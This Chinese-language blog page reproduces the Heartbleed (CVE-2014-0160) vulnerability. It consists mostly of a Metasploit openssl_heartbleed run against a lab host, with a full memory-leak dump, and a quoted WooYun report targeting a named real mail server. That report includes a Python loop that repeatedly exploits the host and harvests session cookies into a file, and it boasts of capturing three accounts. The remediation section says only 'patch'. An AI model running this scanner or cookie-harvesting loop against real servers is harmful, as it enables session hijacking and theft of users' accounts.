HEARTBLEED 漏洞复现
漏洞分析的两篇文章
https://blog.csdn.net/javajiawei/article/details/82429886
set verbose true 才能看到
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
rhosts => 172.16.20.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run [*] 172.16.20.134:443 - Sending Client Hello...
[*] 172.16.20.134:443 - SSL record #1:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 86
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 82
[*] 172.16.20.134:443 - Type: Server Hello (2)
[*] 172.16.20.134:443 - Server Hello Version: 0x0301
[*] 172.16.20.134:443 - Server Hello random data: 5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
[*] 172.16.20.134:443 - Server Hello Session ID length: 32
[*] 172.16.20.134:443 - Server Hello Session ID: cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
[*] 172.16.20.134:443 - SSL record #2:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 909
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 905
[*] 172.16.20.134:443 - Type: Certificate Data (11)
[*] 172.16.20.134:443 - Certificates length: 902
[*] 172.16.20.134:443 - Data length: 905
[*] 172.16.20.134:443 - Certificate #1:
[*] 172.16.20.134:443 - Certificate #1: Length: 899
[*] 172.16.20.134:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
[*] 172.16.20.134:443 - SSL record #3:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 331
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 327
[*] 172.16.20.134:443 - Type: Server Key Exchange (12)
[*] 172.16.20.134:443 - SSL record #4:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 4
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 0
[*] 172.16.20.134:443 - Type: Server Hello Done (14)
[*] 172.16.20.134:443 - Sending Heartbeat...
[*] 172.16.20.134:443 - Heartbeat response, 65535 bytes
[+] 172.16.20.134:443 - Heartbeat response with leak
[*] 172.16.20.134:443 - Printable info leaked:
......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
乌云案例
详细说明:
code 区域
Fortinet邮箱服务器url:https://mail.fortinet.com.cn
存在漏洞的端口:443
该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据
首先是神器openssl.py测试信息:

code 区域
可以看到账户cookie,可以通过如下脚本,不断的抓cookie:
code 区域
import os
import re
import time
accounts = []
while True:
result = os.popen('openssl.py mail.fortinet.com.cn').read()
matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)
for match in matches:
if match not in accounts:
accounts.append(match)
with open('accounts.txt', 'a') as inFile:
inFile.write(str(match) + '\n')
print 'New Account:', match
time.sleep(1.0)
抓了一小会就有三个:

漏洞证明:


修复方案:
补丁
HEARTBLEED 漏洞复现的更多相关文章
- [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...
- heartbleed漏洞利用
1. heartbleed漏洞扫描: 2. heartbleed漏洞利用: poc.py 117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...
- ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程
没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...
- 【S2-052】漏洞复现(CVE-2017-9805)
一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...
- markdown反射型xss漏洞复现
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...
- WebLogic XMLDecoder反序列化漏洞复现
WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...
- Struts2-052 漏洞复现
s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...
- Typecho反序列化导致前台 getshell 漏洞复现
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...
- Tomcat/7.0.81 远程代码执行漏洞复现
Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...
随机推荐
- 【学习笔记:Python-网络编程】Socket 之初见
Socket 是任何一种计算机网络通讯中最基础的内容.当你在浏览器地址栏中输入一个地址时,你会打开一个套接字,可以说任何网络通讯都是通过 Socket 来完成的. Socket 的 python 官方 ...
- 经典卷积神经网络算法(1):LeNet-5
.caret, .dropup > .btn > .caret { border-top-color: #000 !important; } .label { border: 1px so ...
- 前端福利,用 JS 就能实现抖音养号等诸多功能
我是风筝,公众号「古时的风筝」,一个不只有技术的技术公众号,一个在程序圈混迹多年,主业 Java,另外 Python.React 也玩儿的 6 的斜杠开发者. Spring Cloud 系列文章已经完 ...
- layui里面的layer模块弹窗,强制居中的方法!!!
每次调用layer弹窗做动态展示的时候,只要内容不固定或者需要二次渲染 比如layui.form.render()进行渲染的时候 由于弹窗已经出来了,只是content部分的结构改变了宽度或者高度,l ...
- 目前校园百晓生APP与CSDN软件的对比
不忘初心.注入灵魂 设计之初 在做校园百晓生该APP时,初心是为校园的同学提供便捷的查询校园信息的服务,确实目前的软件已经实现了该功能,但是总感觉缺少一些灵魂,感觉大部分人渴望的重点在于信息而不是自己 ...
- [whu1568]dp优化
http://acm.whu.edu.cn/land/problem/detail?problem_id=1568 思路:先将所有数分解,得到2,3,5,7的个数,转化为用这些2,3,5,7" ...
- IOS App打包发布完整流程
注册成为开发者 登录苹果开发者中心,点击Accounts,在这里需要你填写你的Appple ID进行登录,如果没有,点击这里申请一个,填写信息就成,这里就不再赘述.申请完成之后,使用申请的AppID进 ...
- TP5整合的阿里云短信接口
现阶段,短信的应用主要就是用来验证下手机号是不是正常的手机号.只要涉及到用户手机号的问题的时候,都会做短信验证码来验证下改手机号是否是正常手机号.接下来就是操作步骤. 首先要在阿里云账号上开通短信功能 ...
- qt creator源码全方面分析(4-6)
目录 Qt插件基础 Qt插件基础 我们知道Qt Creator源码是基于插件架构的,那么我们先来介绍下插件基础知识. 相关内容如下: How to Create Qt Plugins [ - Defi ...
- Shell脚本定时监控
1.建立脚本文件 autostart.sh #!/bin/bashexport JAVA_HOME=/home/java/jdk1.8.0_191export JRE_HOME=$JAVA_HOME/ ...